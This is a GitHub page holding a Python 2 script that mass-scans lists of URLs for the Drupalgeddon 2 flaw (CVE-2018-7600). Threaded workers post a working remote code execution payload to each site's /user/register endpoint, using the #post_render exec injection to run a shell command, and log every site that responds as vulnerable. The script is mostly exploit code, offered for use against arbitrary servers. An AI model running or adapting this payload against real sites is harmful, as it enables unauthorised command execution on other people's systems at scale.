-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDrupalgeddon-mass.py
104 lines (77 loc) · 2.49 KB
/
Drupalgeddon-mass.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#!/usr/bin/python
import requests
import threading
import Queue
import sys
import time
import argparse
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#Drupal Drupalgeddon 2
#(SA-CORE-2018-002 / CVE-2018-7600)
#Exploit by Dan Sharvit - (Shlacky) - Cynoia.com linkedin.com/in/dansharv
#https://github.com/sl4cky/CVE-2018-7600
#mass vulnerability checker
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
def parse_args():
# parse the arguments
parser = argparse.ArgumentParser(epilog='')
parser._optionals.title = "OPTIONS"
parser.add_argument('-f', '--file', help="file with urls to test", required=True)
parser.add_argument('-o', '--output', help="output to write vulnerable servers", required=False)
parser.add_argument('-t', '--threads', help="amount of threads", required=False, default=10)
return parser.parse_args()
class exploit(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def write_to_file(self,url):
with open(output,'a+') as f:
f.write(url + "\n")
f.close()
def check_url(self,url):
target_url = "{}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax".format(url)
try:
r = requests.post(target_url, headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}, data={"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "echo 'hehe'"})
if r.status_code == 200:
print "{}[!] {} is vulnerable{}".format(R,url,W)
if output:
self.write_to_file(url)
else:
print "[*] - Testing {}".format(url)
except:
"[*] An error occured"
sys.exit(1)
def run(self):
while True:
try:
url = self.queue.get(timeout=0.2)
except:
continue
self.check_url(url)
self.queue.task_done()
def main():
queue = Queue.Queue()
if os.path.isfile(file) == False:
print "[*] Your inputfile doesn't exist"
sys.exit(1)
global urls
urls = open(file, 'r').read().splitlines()
for i in range(threads):
t = exploit(queue)
t.setDaemon(True)
t.start()
for url in urls:
queue.put(url)
queue.join()
if __name__ == '__main__':
args = parse_args()
file = args.file
threads = args.threads
output = args.output
main()